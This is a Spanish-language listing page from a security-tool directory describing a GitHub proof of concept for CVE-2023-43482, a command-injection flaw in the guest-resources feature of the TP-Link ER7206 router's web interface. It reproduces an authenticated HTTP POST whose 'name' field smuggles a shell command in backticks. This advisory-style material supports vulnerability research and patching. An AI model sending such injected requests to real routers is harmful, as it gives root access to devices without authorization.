Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-43482 — TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Vulnerabilidad de inyección de comandos | Kitploit
Herramientas/GitHubGitHub/mr-xn/cve-2023-43482
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubmr-xn/cve-2023-43482

CVE-2023-43482

TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Vulnerabilidad de inyección de comandos

Ver Repositorio
521hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-43482

TP-Link ER7206 Omada Gigabit VPN Router vulnerabilidad de inyección de comandos en uhttpd freeStrategy

RESUMEN

Existe una vulnerabilidad de ejecución de comandos en la funcionalidad de recursos de invitados del enrutador VPN Gigabit Omada TP-Link ER7206 versión 1.3.0 build 20230322 Rel.70591. Una solicitud HTTP especialmente diseñada puede provocar la ejecución de comandos arbitrarios. Un atacante puede realizar una solicitud HTTP autenticada para desencadenar esta vulnerabilidad.

VERSIONES VULNERABLES CONFIRMADAS

Las siguientes versiones fueron probadas o verificadas como vulnerables por Talos o confirmadas como vulnerables por el proveedor.

Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591

URLS DEL PRODUCTO

ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/

DETALLES

El enrutador VPN Gigabit Omada ER7206 es una solución de red de alto rendimiento que admite conectividad Gigabit, VPN altamente segura e integración con Omada SDN para administración centralizada en la nube y aprovisionamiento sin intervención.

El enrutador VPN Gigabit Omada ER7206 ejecuta varios servicios para administrar el enrutador o los dispositivos conectados a él. Uno de esos servicios es uhttpd, que se ejecuta en el puerto 80/443. Proporciona a los usuarios una interfaz web para configurar y administrar el enrutador. De forma predeterminada, el servicio se ejecuta como usuario root. Un atacante puede obtener acceso root al dispositivo explotando este servicio.

Existe una vulnerabilidad de inyección de comandos en el servicio uhttpd cuando se agrega un recurso de invitado al dispositivo. En la interfaz web, la página de recursos de invitados se puede acceder navegando a Autenticación -> Configuración de autenticación -> Recursos de invitados. Contiene funciones para agregar, editar y eliminar recursos de invitados. Cuando se agrega un recurso de invitado, se activa la siguiente solicitud HTTP Post:

root@kitploit:~
POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
Host: 192.168.8.100
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
Content-Length: 470

data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|`/usr/bin/id>/tmp/had`%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D 
Descargar herramienta